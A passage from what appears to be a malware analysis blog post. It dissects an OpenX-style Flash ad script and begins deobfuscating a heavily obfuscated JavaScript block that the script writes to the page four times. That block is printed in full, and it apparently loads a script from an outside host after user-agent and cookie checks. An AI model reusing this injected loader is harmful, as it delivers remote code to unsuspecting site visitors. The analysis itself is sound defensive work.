        return false;
    }
    if (this.major > fv.major) {
        return true;
    }
    if (this.minor < fv.minor) {
        return false;
    }
    if (this.minor > fv.minor) {
        return true;
    }
    if (this.rev < fv.rev) {
        return false;
    }
    return true;
};
Next we have a utility function that parses values out of attributes in the URL – this is likely a way for the code to accept input to control its functionality:
org.openx.util = {
    getRequestParameter: function(_2b) {
        var q = document.location.search || document.location.hash;
        if (_2b == null) {
            return q;
        }
        if (q) {
            var _2d = q.substring(1).split("&");
            for (var i = 0; i < _2d.length; i++) {
                if (_2d[i].substring(0, _2d[i].indexOf("=")) == _2b) {
                    return _2d[i].substring((_2d[i].indexOf("=") + 1));
                }
            }
        }
        return "";
    }
};
A couple of cleanup functions follow that, to let the code remove itself after execution:
org.openx.SWFObjectUtil.cleanupSWFs = function() {
    var _2f = document.getElementsByTagName("OBJECT");
    for (var i = _2f.length - 1; i >= 0; i--) {
        _2f[i].style.display = "none";
        for (var x in _2f[i]) {
            if (typeof _2f[i][x] == "function") {
                _2f[i][x] = function() {};
            }
        }
    }
};
if (org.openx.SWFObject.doPrepUnload) {
    if (!org.openx.unloadSet) {
        org.openx.SWFObjectUtil.prepUnload = function() {
            __flash_unloadHandler = function() {};
            __flash_savedUnloadHandler = function() {};
            window.attachEvent("onunload", org.openx.SWFObjectUtil.cleanupSWFs);
        };
        window.attachEvent("onbeforeunload", org.openx.SWFObjectUtil.prepUnload);
        org.openx.unloadSet = true;
    }
}
Following that, we find a function that adds support for getElementById if it isn't natively supported by the browser:
if (!document.getElementById && document.all) {
    document.getElementById = function(id) {
        return document.all[id];
    };
}
Up to this point, everything has been pretty straightforward – it appears we have javascript code that embeds a Flash object that is tailored to the browser and version of Flash installed. This could be legitimate or malicious depending on how it is used – it could just be code for Flash-based ads.
A little bit of OSINT sheds more light on the nature of the code above: OpenX is apparently an advertising company that "provides digital and advertising technologies that optimize a company's advertising revenue." OpenSWF, according to Wikipedia, "is an open-source JavaScript library used to embed Adobe Flash content onto Web pages.... The library can also detect the installed Adobe Flash Player plug-in in all major web browsers, on all major operating systems (OS), and can redirect the visitor to another webpage or show alternate HTML content if the installed plug-in is not suitable." That matches up pretty well to what we've seen so far.
The code that follows gets a bit more interesting. We have a few variable declarations:
var getQueryParamValue = org.openx.util.getRequestParameter;
var FlashObject = org.openx.SWFObject;
var SWFObject = org.openx.SWFObject;
document.mmm_fo = 1;
var OX_0f4f918e = '';
Then we have this big ugly block of unintelligible code:
OX_0f4f918e += "<" + "script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + "\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<" + "/script><" + "!--ffnqt-->\n";
Interestingly, we see that exact same block of code repeated three times with only slight variations in the enclosing HTML tags. The first one above simply puts javascript in a <script> tag. The second encloses it in a <div> tag with an id attribute in addition to the <script> tag. The third instance goes back to using just a <script> tag, but prepends it with a linked image:
<a href='http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287' target='_blank'><img src='http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif' width='300' height='250' alt='' title='' border='0' /></a>
This looks a lot like a banner ad, and a quick check of the domains against VirusTotal confirms that suspicion:



That second one should raise an eyebrow since "adult content" combined with "ads" can often lead to malicious content injection. We still haven't found anything outright malicious, though, so let's continue on.
Next we see the same block of unintelligible code repeated yet again, followed by this:
OX_0f4f918e += "<" + "script type=\'text/javascript\'><" + "!--// <" + "![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); } else { document.write(\"<" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;fb=1&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div>\"); }\n";
It looks like a banner ad link is now being attached to the Flash object itself. We then have a single-pixel tracking beacon placed on the page for those who have javascript disabled:
OX_0f4f918e += "// ]]> --><" + "/script><" + "noscript><" + "div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><" + "img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;fb=1&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><" + "/div><" + "/noscript>
...and then one more copy of the unintelligible code. Finally, the last line prints all of the above to the browser page:
document.write(OX_0f4f918e);
What have we learned so far? Not much, really, except that somebody really wants that unintelligible code block to execute. So much so that they thought it would be a good idea to print it to the page four times! I admit I don't understand why they chose this particular tactic, but perhaps since each block includes a try {} statement, they are simply giving the script multiple chances to execute successfully. Now let's see if we can't figure out what it's actually trying to do.

Step 3: Deobfuscation

Here we finally get to the fun part: deobfuscating the unintelligible code. Let's isolate the block of code we care about:
try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<" + "\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><" + "/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}
Since that block of code was assigned to a variable as a string, it contains several quotes and other characters that are escaped. Specifically, we can see double quotes, single quotes, and backslashes that need to be unescaped. Order of operations is important here: we need to unescape the backslashes first, then each set of quotes. The result is a bit cleaner:
try{$a=~[];$a={___:++$a,$$$$:(![]+"")[$a],__$:++$a,$_$_:(![]+"")[$a],_$_:++$a,$_$$:({}+"")[$a],$$_$:($a[$a]+"")[$a],_$$:++$a,$$$_:(!""+"")[$a],$__:++$a,$_$:++$a,$$__:({}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<" + 